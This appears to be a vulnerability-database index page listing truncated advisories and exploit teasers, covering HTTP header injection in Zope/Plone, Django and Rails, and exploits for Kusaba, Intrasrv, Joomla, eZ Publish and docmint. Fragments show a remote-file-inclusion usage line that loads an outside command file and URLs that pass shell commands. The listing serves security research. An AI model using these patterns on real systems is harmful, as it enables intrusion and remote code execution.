HTTP header injection in Plone and Zope2

ZPublisher.HTTPRequest.scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed LF character...

WooCommerce Catalog Enquiry - Arbitrary File Upload

Email from user: "A 'fix' for the file upload vulnerability seems to have been introduced in version 3.0.2 with the cryptic description "Fixed some data issues." However I hope you're aware that the vulnerability still exists and can be exploited by simply changing Content-Type in the HTTP reques...

PYSEC-2014-73

ZPublisher.HTTPRequest.scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed LF character...

Kusaba <= 1.0.4 - Remote Code Execution Exploit

No description provided by source. ?php / 9 Oct 2008 Kusaba = 1.0.4 Remote Code Execution Sausage [email protected] After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print Hello; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello / $shellname =...

Intrasrv 1.0 Buffer Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "Intrasrv 1.0 Buff...

CVE-2012-4520

The django.http.HttpRequest.gethost function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

PYSEC-2012-7

The django.http.HttpRequest.gethost function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

CVE-2012-4520

The django.http.HttpRequest.gethost function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

CVE-2012-4520

CVE-2012-4520 concerns Django’s http.HttpRequest.get_host, where Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 can be exploited by crafting the Host header to cause the application to display arbitrary URLs, potentially impacting views such as password resets. The vulnerability is described ac...

CVE-2012-4520

The django.http.HttpRequest.gethost function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

Joomla Component com_commedia SQL Injection Exploit

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server folder, single path to ftp-file or a HTTPS-server DROPBOX, folder, single path to http-file or http-radio Exploit Title:...

Atlassian Crowd XML Entity Expansion Remote File Access

This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. This module has been tested successfully on Linux and Windows...

Ruby on Rails 3.0.5 - WEBrick::HTTPRequest Module HTTP Header Injection

Ruby on Rails 3.0.5 - WEBrick::HTTPRequest Module HTTP Header Injection source: https://www.securityfocus.com/bid/46423/info Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP...

phpAuthentAdmin Cross Site Scripting

!/usr/bin/perl Autor: Yoyahack Web: http://undersecurity.net Gretz: OzX, p0fk, SeC, ksha, seth, champloo, SH4V.... use LWP::UserAgent; use HTTP::Request::Common; Source print q--------------------------------- Autor: Yoyahack Web: http://undersecurity.net Gretz: OzX, p0fk, SeC, ksha, seth,...

eZ Publish &lt; 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit

No description provided by source. ?php / eZ Publish privilege escalation exploit by s4avrd0w [email protected] Versions affected = 3.5.6 Resolved in 3.9.5, 3.10.1, 4.0.1 More info:...

[Full-disclosure] Safari XMLHttpRequest HTTP header injection

Westpoint Security Advisory --------------------------- Title: Safari XMLHttpRequest HTTP header injection Risk Rating: Low Platforms: MacOS and Windows Author: Richard Moore [email protected] Date: 25 June 2007 Advisory ID: wp-07-0002 URL: http://www.westpoint.ltd.uk/advisories/wp-07-0002.tx...

docmint 2.0 - &#039;/engine/require.php&#039; Remote File Inclusion

!/usr/bin/perl docmint perl docmint.pl http://target.com/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Greetz: My Dearest Wife - ping, echo|staff y3dips,theday,moby,comex,z3r0byt3,c-a-s-e,Sto,lirva32,negative, SinChan, sakitjiwa, maSter-oP, mrny3m, bithedz, lieur-eu...